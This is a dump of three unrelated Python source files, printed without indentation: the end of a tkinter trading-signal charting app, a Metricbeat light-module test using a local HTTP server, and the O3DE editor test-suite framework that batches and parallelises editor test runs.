canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(44444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.CCI, lw = 1., color = '#e64af0', label = 'CCI')
ax1.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax1.legend(loc = 1)
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.HCCI, lw = 1., color = '#e64af0', label = 'HCCI')
ax3.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(55555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.CCI, lw = 1., color = '#e64af0', label = 'CCI')
ax1.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax1.legend(loc = 1)
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.HCCI, lw = 1., color = '#e64af0', label = 'HCCI')
ax3.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha=0.3)
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
else:
return None
frameplot.grid(row = 2, column = 0)
#%%
if __name__ == '__main__':
import multiprocessing
import time
import datetime
path = {'mainPath': '/home/kenneth/Documents/GIT_PROJECTS/AI-Signal-Generator',
'acountPath': 'DOCS/account_id.txt',
'tokenPath': 'DOCS/token.txt',
'telegram': 'DOCS/telegram.txt',
'predicted': 'PREDICTED',
'signals': 'SIGNALS',
'start': '2019-04-01T00:00:00Z',
'end': str(datetime.datetime.utcnow().isoformat('T')[:-7] +'Z'),
'environment': 'live',
'strategy': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '11',
'22', '33', '44', '55', '66', '77', '88', '99', '111',
'222', '333', '444', '555', '666', '777', '888', '999', '1111',
'2222', '3333', '4444', '5555', '6666', '7777', '8888', '9999',
'11111', '22222', '33333', '44444', '55555'],
'instruments': 'AUD_USD,BCO_USD,BTC_USD,DE30_EUR,EUR_AUD,EUR_JPY,EUR_USD,GBP_JPY,GBP_USD,'+\
'NAS100_USD,SPX500_USD,US30_USD,USD_CAD,USD_JPY,XAU_USD',
'timeframes': ['M15', 'M30', 'H1', 'H2', 'H3', 'H4', 'H6', 'H8',
'H12', 'D', 'W']}
#tkinter mainloop
def steamerloop(path):
root = tk.Tk()
root.title("AI Signal Generator")
root.option_add("*Font", "Calibri 10 bold")
#style
s = ttk.Style()
s.theme_create( "MyStyle", parent="alt", settings={
"TNotebook": {"configure": {"tabmargins": [2, 5, 2, 0] } },
"TNotebook.Tab": {"configure": {"padding": [50, 10],
"font" : ('Calibri', '10', 'bold')},}})
s.theme_use("MyStyle")
tabSpace = ttk.Notebook(root)
firstFrame = ttk.Frame(tabSpace)
secondFrame = ttk.Frame(tabSpace)
thirdFrame = ttk.Frame(tabSpace)
#--signal
streamSignal(firstFrame, path).pack()
#--visualization
visu(secondFrame, path).pack()
#--Returns
Returns(thirdFrame, path).pack()
#--Notebooks
tabSpace.add(firstFrame, text = 'Automated signal')
tabSpace.add(secondFrame, text = 'Visualize signals')
tabSpace.add(thirdFrame, text = 'Recommendation')
tabSpace.pack()
root.resizable(0,0)
root.mainloop()
#queue tkinter app
def mainloop(function, arg, queue):
queue.put(function(arg))
q = multiprocessing.Queue()
multiprocessing.Process(target = mainloop, args=(steamerloop, path, q)).start()
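# A minimal, self-contained sketch (hypothetical names, not part of the classes above) of the
# launch pattern used here: run a function in a child process and collect its return value
# through a multiprocessing.Queue. Kept commented out so it does not change this script's behavior.
#
# import multiprocessing
#
# def worker(value, queue):
#     queue.put(value * 2)  # stand-in for steamerloop(path)
#
# if __name__ == '__main__':
#     q = multiprocessing.Queue()
#     p = multiprocessing.Process(target=worker, args=(21, q))
#     p.start()
#     print(q.get())  # -> 42
#     p.join()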
|
test_lightmodules.py
|
import http.server
import metricbeat
import os
import os.path
import platform
import shutil
import sys
import threading
import unittest
import json
from contextlib import contextmanager
class Test(metricbeat.BaseTest):
@unittest.skipIf(platform.platform().startswith("Windows-10"),
"flaky test: https://github.com/elastic/beats/issues/26181")
def test_processors(self):
shutil.copytree(
os.path.join(self.beat_path, "mb/testing/testdata/lightmodules"),
os.path.join(self.working_dir, "module"),
)
with http_test_server() as server:
self.render_config_template(modules=[{
"name": "test",
"metricsets": ["json"],
"namespace": "test",
# Hard-coding 'localhost' because hostname in server.server_name doesn't always work.
"hosts": [f"localhost:{server.server_port}"],
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
self.assert_no_logged_warnings()
output = self.read_output_json()
self.assertGreater(len(output), 0)
for evt in output:
self.assertEqual(evt["fields"]["test"], "fromprocessor")
@contextmanager
def http_test_server():
server = http.server.HTTPServer(('localhost', 0), TestHTTPHandler)
child = threading.Thread(target=server.serve_forever)
child.start()
yield server
server.shutdown()
child.join()
class TestHTTPHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"foo": "bar"}).encode("utf-8"))
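# Minimal usage sketch for the helper above (standard library only; kept commented out so the
# test module is unchanged): the context manager yields a live server on an ephemeral port that
# serves the JSON payload defined in TestHTTPHandler.
#
# import urllib.request
#
# with http_test_server() as srv:
#     body = urllib.request.urlopen(f"http://localhost:{srv.server_port}").read()
#     assert json.loads(body) == {"foo": "bar"}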
|
editor_test.py
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import pytest
from _pytest.skipping import pytest_runtest_setup as skipping_pytest_runtest_setup
import inspect
from typing import List
from abc import ABC
from inspect import getmembers, isclass
import os, sys
import threading
import math
import json
import logging
import types
import functools
import re
import ly_test_tools.environment.file_system as file_system
import ly_test_tools.environment.waiter as waiter
import ly_test_tools.environment.process_utils as process_utils
from ly_test_tools.o3de.asset_processor import AssetProcessor
from ly_test_tools.launchers.exceptions import WaitTimeoutError
from . import editor_test_utils as editor_utils
# This file provides editor testing functionality to easily write automated editor tests for O3DE.
# To use these utilities, subclass your test suite from EditorTestSuite; this gives an easy way of specifying
# python test scripts that the editor will run without needing to write any boilerplate code.
# It supports out-of-the-box parallelization (running multiple editor instances at once), batching (running multiple tests in the same editor instance) and
# crash detection.
# Usage example:
# class MyTestSuite(EditorTestSuite):
#
# class MyFirstTest(EditorSingleTest):
# from . import script_to_be_run_by_editor as test_module
#
# class MyTestInParallel_1(EditorParallelTest):
# from . import another_script_to_be_run_by_editor as test_module
#
# class MyTestInParallel_2(EditorParallelTest):
# from . import yet_another_script_to_be_run_by_editor as test_module
#
#
# EditorTestSuite does introspection of the defined classes inside of it and automatically prepares the tests, parallelizing/batching as required
# This file contains no tests itself; setting __test__ = False makes sure it won't be picked up by the runner even though the filename ends with _test
__test__ = False
# Abstract base class for an editor test.
class EditorTestBase(ABC):
# Maximum time for run, in seconds
timeout = 180
# Test file that this test will run
test_module = None
# Test that will be run alone in one editor
class EditorSingleTest(EditorTestBase):
# Extra cmdline arguments to supply to the editor for the test
extra_cmdline_args = []
# Custom setup function, will run before the test
@staticmethod
def setup(instance, request, workspace, editor, editor_test_results, launcher_platform):
pass
# Custom run wrapping. The code before yield will run before the test, and after the yield after the test
@staticmethod
def wrap_run(instance, request, workspace, editor, editor_test_results, launcher_platform):
yield
# Custom teardown function, will run after the test
@staticmethod
def teardown(instance, request, workspace, editor, editor_test_results, launcher_platform):
pass
# Test that will both be run in parallel and batched with the other shared tests in a single editor.
# Does not support per-test setup/teardown, to avoid any possible race conditions
class EditorSharedTest(EditorTestBase):
# Specifies if the test can be batched in the same editor
is_batchable = True
# Specifies if the test can be run in multiple editors in parallel
is_parallelizable = True
# Test that will only be run in parallel editors, never batched with others.
class EditorParallelTest(EditorSharedTest):
is_batchable = False
is_parallelizable = True
# Test that will be batched along with the other batched tests in the same editor.
class EditorBatchedTest(EditorSharedTest):
is_batchable = True
is_parallelizable = False
class Result:
class Base:
def get_output_str(self):
if hasattr(self, "output") and self.output is not None:
return self.output
else:
return "-- No output --"
def get_editor_log_str(self):
if hasattr(self, "editor_log") and self.editor_log is not None:
return self.editor_log
else:
return "-- No editor log found --"
class Pass(Base):
@classmethod
def create(cls, output : str, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test Passed\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
)
return output
class Fail(Base):
@classmethod
def create(cls, output, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test FAILED\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Crash(Base):
@classmethod
def create(cls, output : str, ret_code : int, stacktrace : str, editor_log : str):
r = cls()
r.output = output
r.ret_code = ret_code
r.stacktrace = stacktrace
r.editor_log = editor_log
return r
def __str__(self):
stacktrace_str = "-- No stacktrace data found --" if not self.stacktrace else self.stacktrace
output = (
f"Test CRASHED, return code {hex(self.ret_code)}\n"
f"---------------\n"
f"| Stacktrace |\n"
f"---------------\n"
f"{stacktrace_str}"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Timeout(Base):
@classmethod
def create(cls, output : str, time_secs : float, editor_log : str):
r = cls()
r.output = output
r.time_secs = time_secs
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test TIMED OUT after {self.time_secs} seconds\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Unknown(Base):
@classmethod
def create(cls, output : str, extra_info : str, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
r.extra_info = extra_info
return r
def __str__(self):
output = (
f"Unknown test result, possible cause: {self.extra_info}\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
@pytest.mark.parametrize("crash_log_watchdog", [("raise_on_crash", False)])
class EditorTestSuite():
#- Configurable params -#
# Extra cmdline arguments to supply for every editor instance for this test suite
global_extra_cmdline_args = ["-BatchMode", "-autotest_mode"]
# Tests usually run with no renderer, however some tests require a renderer
use_null_renderer = True
# Maximum time for a single editor to stay open on a shared test
timeout_editor_shared_test = 300
# Function to calculate the number of editors to run in parallel; this can be overridden by the user
@staticmethod
def get_number_parallel_editors():
return 8
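# For example (hypothetical suite, shown only as an illustration), a subclass can override this:
# class MyTestSuite(EditorTestSuite):
#     @staticmethod
#     def get_number_parallel_editors():
#         return 4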
## Internal ##
_TIMEOUT_CRASH_LOG = 20 # Maximum time (seconds) to wait for a crash file
_TEST_FAIL_RETCODE = 0xF # Return code for test failure
_asset_processor = None
_results = {}
@pytest.fixture(scope="class")
def editor_test_results(self, request):
results = {}
return results
class Runner():
def __init__(self, name, func, tests):
self.name = name
self.func = func
self.tests = tests
self.run_pytestfunc = None
self.result_pytestfuncs = []
# Custom collector class. This collector is where the magic happens: it programmatically adds the test functions
# to the class based on the test specifications used in the TestSuite class.
class EditorTestClass(pytest.Class):
def collect(self):
cls = self.obj
# This collector does the following:
# 1) Iterates through all the EditorSingleTest subclasses defined inside the suite.
# With these, it adds one test function to the suite per subclass, which will run the test using the specs
# 2) Iterates through all the EditorSharedTest subclasses defined inside the suite.
# The subclasses are then grouped, based on the specs, into 3 categories:
# batched, parallel and batched+parallel.
# Each category will have a test runner function associated that will run all the tests of the category,
# then a result function will be added for every test, which will pass/fail based on what happened in the previous
# runner function
# Decorator function to add extra lookup information for the test functions
def set_marks(marks):
def spec_impl(func):
@functools.wraps(func)
def inner(*args, **argv):
return func(*args, **argv)
inner.marks = marks
return inner
return spec_impl
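# For example, a function decorated with @set_marks({"run_type": "run_single"}) can later be
# recognized via getattr(func, "marks", {}).get("run_type"), which is how the collector below
# tells runner, result and single-test functions apart.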
# Retrieve the test specs
single_tests = self.obj.get_single_tests()
shared_tests = self.obj.get_shared_tests()
batched_tests = cls.filter_shared_tests(shared_tests, is_batchable=True)
parallel_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True)
parallel_batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=True)
# If user provides option to not parallelize/batch the tests, move them into single tests
no_parallelize = self.config.getoption("--no-editor-parallel", default=False)
no_batch = self.config.getoption("--no-editor-batch", default=False)
if no_parallelize:
single_tests += parallel_tests
parallel_tests = []
batched_tests += parallel_batched_tests
parallel_batched_tests = []
if no_batch:
single_tests += batched_tests
batched_tests = []
parallel_tests += parallel_batched_tests
parallel_batched_tests = []
# Add the single tests, these will run normally
for test_spec in single_tests:
name = test_spec.__name__
def make_test_func(name, test_spec):
@set_marks({"run_type" : "run_single"})
def single_run(self, request, workspace, editor, editor_test_results, launcher_platform):
# only single tests are allowed to have setup/teardown, however we can have shared tests that
# were explicitly set as single, for example via cmdline argument override
is_single_test = issubclass(test_spec, EditorSingleTest)
if is_single_test:
# Setup step for wrap_run
wrap = test_spec.wrap_run(self, request, workspace, editor, editor_test_results, launcher_platform)
assert isinstance(wrap, types.GeneratorType), "wrap_run must return a generator, did you forget 'yield'?"
next(wrap, None)
# Setup step
test_spec.setup(self, request, workspace, editor, editor_test_results, launcher_platform)
# Run
self._run_single_test(request, workspace, editor, editor_test_results, test_spec)
if is_single_test:
# Teardown
test_spec.teardown(self, request, workspace, editor, editor_test_results, launcher_platform)
# Teardown step for wrap_run
next(wrap, None)
return single_run
f = make_test_func(name, test_spec)
if hasattr(test_spec, "pytestmark"):
f.pytestmark = test_spec.pytestmark
setattr(self.obj, name, f)
# Add the shared tests, for these we will create a runner class for storing the run information
# that will be later used for selecting what tests runners will be run
runners = []
def create_runner(name, function, tests):
runner = EditorTestSuite.Runner(name, function, tests)
def make_func():
@set_marks({"runner" : runner, "run_type" : "run_shared"})
def shared_run(self, request, workspace, editor, editor_test_results, launcher_platform):
getattr(self, function.__name__)(request, workspace, editor, editor_test_results, runner.tests)
return shared_run
setattr(self.obj, name, make_func())
# Add the shared test results; these just succeed/fail based on what happened in the Runner.
for test_spec in tests:
def make_func(test_spec):
@set_marks({"runner" : runner, "test_spec" : test_spec, "run_type" : "result"})
def result(self, request, workspace, editor, editor_test_results, launcher_platform):
# The runner must have filled the editor_test_results dict fixture for this test.
# Hitting this assert could mean there was an error executing the runner
assert test_spec.__name__ in editor_test_results, f"No run data for test: {test_spec.__name__}."
cls._report_result(test_spec.__name__, editor_test_results[test_spec.__name__])
return result
result_func = make_func(test_spec)
if hasattr(test_spec, "pytestmark"):
result_func.pytestmark = test_spec.pytestmark
setattr(self.obj, test_spec.__name__, result_func)
runners.append(runner)
create_runner("run_batched_tests", cls._run_batched_tests, batched_tests)
create_runner("run_parallel_tests", cls._run_parallel_tests, parallel_tests)
create_runner("run_parallel_batched_tests", cls._run_parallel_batched_tests, parallel_batched_tests)
# Now that we have added all the functions to the class, we will run
# a class test collection to retrieve all the tests.
instance = super().collect()[0]
# Override the istestfunction for the object, with this we make sure that the
# runners are always collected, even if they don't follow the "test_" naming
original_istestfunction = instance.istestfunction
def istestfunction(self, obj, name):
ret = original_istestfunction(obj, name)
if not ret:
ret = hasattr(obj, "marks")
return ret
instance.istestfunction = types.MethodType(istestfunction, instance)
collection = instance.collect()
def get_func_run_type(f):
return getattr(f, "marks", {}).setdefault("run_type", None)
collected_run_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "run_shared"
]
collected_result_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "result"
]
# We'll remove and store the runner functions for later; this way they won't
# be deselected by any filtering mechanism. The result functions, however, we do want
# to be filtered, so they tell us what the final subset of tests to run is
collection = [
item for item in collection if item not in (collected_run_pytestfuncs)
]
# Match each generated pytest function with its runner and store them
for run_pytestfunc in collected_run_pytestfuncs:
runner = run_pytestfunc.function.marks["runner"]
runner.run_pytestfunc = run_pytestfunc
for result_pytestfunc in collected_result_pytestfuncs:
runner = result_pytestfunc.function.marks["runner"]
runner.result_pytestfuncs.append(result_pytestfunc)
self.obj._runners = runners
return collection
@staticmethod
def pytest_custom_makeitem(collector, name, obj):
return EditorTestSuite.EditorTestClass(name, collector)
@classmethod
def pytest_custom_modify_items(cls, session, items, config):
# Add the runner functions here and filter the tests that will be run.
# The runners will be added if they have any selected tests
new_items = []
for runner in cls._runners:
runner.tests[:] = cls.filter_session_shared_tests(items, runner.tests)
if len(runner.tests) > 0:
new_items.append(runner.run_pytestfunc)
# Re-order dependent tests so they are run just after the runner
for result_pytestfunc in runner.result_pytestfuncs:
found_test = next((item for item in items if item == result_pytestfunc), None)
if found_test:
items.remove(found_test)
new_items.append(found_test)
items[:] = items + new_items
@classmethod
def get_single_tests(cls):
single_tests = [c[1] for c in cls.__dict__.items() if inspect.isclass(c[1]) and issubclass(c[1], EditorSingleTest)]
return single_tests
@classmethod
def get_shared_tests(cls):
shared_tests = [c[1] for c in cls.__dict__.items() if inspect.isclass(c[1]) and issubclass(c[1], EditorSharedTest)]
return shared_tests
@classmethod
def get_session_shared_tests(cls, session):
shared_tests = cls.get_shared_tests()
return cls.filter_session_shared_tests(session, shared_tests)
@staticmethod
def filter_session_shared_tests(session_items, shared_tests):
# Retrieve the test sub-set that was collected
# this can be less than the original set if some were overridden via the -k argument or similar
def will_run(item):
try:
skipping_pytest_runtest_setup(item)
return True
except:
return False
session_items_by_name = { item.originalname:item for item in session_items }
selected_shared_tests = [test for test in shared_tests if test.__name__ in session_items_by_name.keys() and will_run(session_items_by_name[test.__name__])]
return selected_shared_tests
@staticmethod
def filter_shared_tests(shared_tests, is_batchable=False, is_parallelizable=False):
# Filter the shared tests based on the requested batchable/parallelizable flags
return [
t for t in shared_tests if (
getattr(t, "is_batchable", None) is is_batchable
and
getattr(t, "is_parallelizable", None) is is_parallelizable
)
]
def setup_class(cls):
cls._asset_processor = None
def teardown_class(cls):
if cls._asset_processor:
cls._asset_processor.stop(1)
cls._asset_processor.teardown()
cls._asset_processor = None
editor_utils.kill_all_ly_processes(include_asset_processor=True)
else:
editor_utils.kill_all_ly_processes(include_asset_processor=False)
### Utils ###
# Prepares the asset processor for the test
def _prepare_asset_processor(self, workspace):
try:
# Start-up an asset processor if we are not running one
# If another AP process exists, don't kill it, as we don't own it
if self._asset_processor is None:
if not process_utils.process_exists("AssetProcessor", ignore_extensions=True):
editor_utils.kill_all_ly_processes()
self._asset_processor = AssetProcessor(workspace)
self._asset_processor.start()
else:
editor_utils.kill_all_ly_processes(include_asset_processor=False)
else:
# Make sure the asset processor from before wasn't closed by accident
self._asset_processor.start()
except Exception as ex:
self._asset_processor = None
raise ex
def _setup_editor_test(self, editor, workspace):
self._prepare_asset_processor(workspace)
editor_utils.kill_all_ly_processes(include_asset_processor=False)
editor.configure_settings()
# Utility function for parsing the output information from the editor.
# It deserializes the JSON content printed in the output for every test and returns that information.
@staticmethod
def _get_results_using_output(test_spec_list, output, editor_log_content):
results = {}
pattern = re.compile(r"JSON_START\((.+?)\)JSON_END")
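# For example, the editor output is expected to contain lines like (illustrative values only):
# JSON_START({"name": "my_test_module", "success": true, "output": "..."})JSON_END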
out_matches = pattern.finditer(output)
found_jsons = {}
for m in out_matches:
try:
elem = json.loads(m.groups()[0])
found_jsons[elem["name"]] = elem
except Exception:
continue # Avoid failing if the output data is corrupt
# Try to find the element in the log, this is used for cutting the log contents later
log_matches = pattern.finditer(editor_log_content)
for m in log_matches:
try:
elem = json.loads(m.groups()[0])
if elem["name"] in found_jsons:
found_jsons[elem["name"]]["log_match"] = m
except Exception:
continue # Avoid failing if the log data is corrupt
log_start = 0
for test_spec in test_spec_list:
name = editor_utils.get_module_filename(test_spec.test_module)
if name not in found_jsons.keys():
results[test_spec.__name__] = Result.Unknown.create(output, "Couldn't find any test run information on stdout", editor_log_content)
else:
result = None
json_result = found_jsons[name]
json_output = json_result["output"]
# Cut the editor log so it only has the output for this run
m = json_result["log_match"]
end = m.end() if test_spec != test_spec_list[-1] else -1
cur_log = editor_log_content[log_start : end]
log_start = end
if json_result["success"]:
result = Result.Pass.create(json_output, cur_log)
else:
result = Result.Fail.create(json_output, cur_log)
results[test_spec.__name__] = result
return results
# Fails the test if the result is not a PASS, reporting the result details
@staticmethod
def _report_result(name : str, result : Result.Base):
if isinstance(result, Result.Pass):
output_str = f"Test {name}:\n{str(result)}"
print(output_str)
else:
error_str = f"Test {name}:\n{str(result)}"
pytest.fail(error_str)
### Running tests ###
# Starts the editor with the given test and returns a result dict with a single element specifying the result
def _exec_editor_test(self, request, workspace, editor, run_id : int, log_name : str,
test_spec : EditorTestBase, cmdline_args : List[str] = []):
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
test_result = None
results = {}
output = ""  # initialized up front so the WaitTimeoutError handler below can still reference it
test_filename = editor_utils.get_testcase_module_filepath(test_spec.test_module)
cmdline = [
"--runpythontest", test_filename,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles = False, launch_ap = False, configure_settings=False)
try:
editor.wait(test_spec.timeout)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
if return_code == 0:
test_result = Result.Pass.create(output, editor_log_content)
else:
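# Any non-zero return code other than the dedicated test-failure retcode is treated as a crash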
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
test_result = Result.Crash.create(output, return_code, editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG), None)
editor_utils.cycle_crash_report(run_id, workspace)
else:
test_result = Result.Fail.create(output, editor_log_content)
except WaitTimeoutError:
editor.kill()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
test_result = Result.Timeout.create(output, test_spec.timeout, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
results = self._get_results_using_output([test_spec], output, editor_log_content)
results[test_spec.__name__] = test_result
return results
# Starts an editor executable with a list of tests and returns a dict with the result of every test run within that editor
# instance. In case of failure, this function also parses the editor output to find out which specific tests failed.
def _exec_editor_multitest(self, request, workspace, editor, run_id : int, log_name : str,
test_spec_list : List[EditorTestBase], cmdline_args=[]):
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
results = {}
test_filenames_str = ";".join(editor_utils.get_testcase_module_filepath(test_spec.test_module) for test_spec in test_spec_list)
cmdline = [
"--runpythontest", test_filenames_str,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles = False, launch_ap = False, configure_settings=False)
output = ""
editor_log_content = ""
try:
editor.wait(self.timeout_editor_shared_test)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
if return_code == 0:
# No need to scrape the output, as all the tests have passed
for test_spec in test_spec_list:
results[test_spec.__name__] = Result.Pass.create(output, editor_log_content)
else:
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crashed_test = None
for key, result in results.items():
if isinstance(result, Result.Unknown):
if not crashed_test:
crash_error = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
editor_utils.cycle_crash_report(run_id, workspace)
results[key] = Result.Crash.create(output, return_code, crash_error, result.editor_log)
crashed_test = results[key]
else:
results[key] = Result.Unknown.create(output, f"This test has an unknown result; test '{crashed_test.__name__}' crashed before this test could be executed", result.editor_log)
except WaitTimeoutError:
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
editor.kill()
for key, result in results.items():
if isinstance(result, Result.Unknown):
results[key] = Result.Timeout.create(result.output, self.timeout_editor_shared_test, result.editor_log)
return results
# Runs a single test with the given specs, used by the collector to register the test
def _run_single_test(self, request, workspace, editor, editor_test_results, test_spec : EditorTestBase):
self._setup_editor_test(editor, workspace)
extra_cmdline_args = []
if hasattr(test_spec, "extra_cmdline_args"):
extra_cmdline_args = test_spec.extra_cmdline_args
results = self._exec_editor_test(request, workspace, editor, 1, "editor_test.log", test_spec, extra_cmdline_args)
if not hasattr(self.__class__, "_results"):
self.__class__._results = {}
editor_test_results.update(results)
test_name, test_result = next(iter(results.items()))
self._report_result(test_name, test_result)
# Runs a batch of tests in one single editor with the given spec list
def _run_batched_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
results = self._exec_editor_multitest(request, workspace, editor, 1, "editor_test.log", test_spec_list, extra_cmdline_args)
assert results is not None
editor_test_results.update(results)
# Runs multiple editors with one test on each editor
def _run_parallel_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
parallel_editors = self._get_number_parallel_editors(request)
assert parallel_editors > 0, "Must have at least one editor"
# If there are more tests than max parallel editors, we will split them into multiple consecutive runs
num_iterations = int(math.ceil(len(test_spec_list) / parallel_editors))
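# e.g. 7 tests with 3 parallel editors -> ceil(7/3) = 3 iterations, running 3, 3 and 1 editors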
for iteration in range(num_iterations):
tests_for_iteration = test_spec_list[iteration*parallel_editors:(iteration+1)*parallel_editors]
total_threads = len(tests_for_iteration)
threads = []
results_per_thread = [None] * total_threads
for i in range(total_threads):
def make_func(test_spec, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = self._exec_editor_test(request, workspace, my_editor, index+1, f"editor_test.log", test_spec, extra_cmdline_args)
assert results is not None
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_iteration[i], i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
for result in results_per_thread:
editor_test_results.update(result)
# Runs multiple editors with a batch of tests for each editor
def _run_parallel_batched_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
total_threads = self._get_number_parallel_editors(request)
assert total_threads > 0, "Must have at least one editor"
threads = []
tests_per_editor = int(math.ceil(len(test_spec_list) / total_threads))
results_per_thread = [None] * total_threads
for i in range(total_threads):
tests_for_thread = test_spec_list[i*tests_per_editor:(i+1)*tests_per_editor]
def make_func(test_spec_list_for_editor, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = None
if len(test_spec_list_for_editor) > 0:
results = self._exec_editor_multitest(request, workspace, my_editor, index+1, f"editor_test.log", test_spec_list_for_editor, extra_cmdline_args)
assert results is not None
else:
results = {}
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_thread, i, cur_editor)
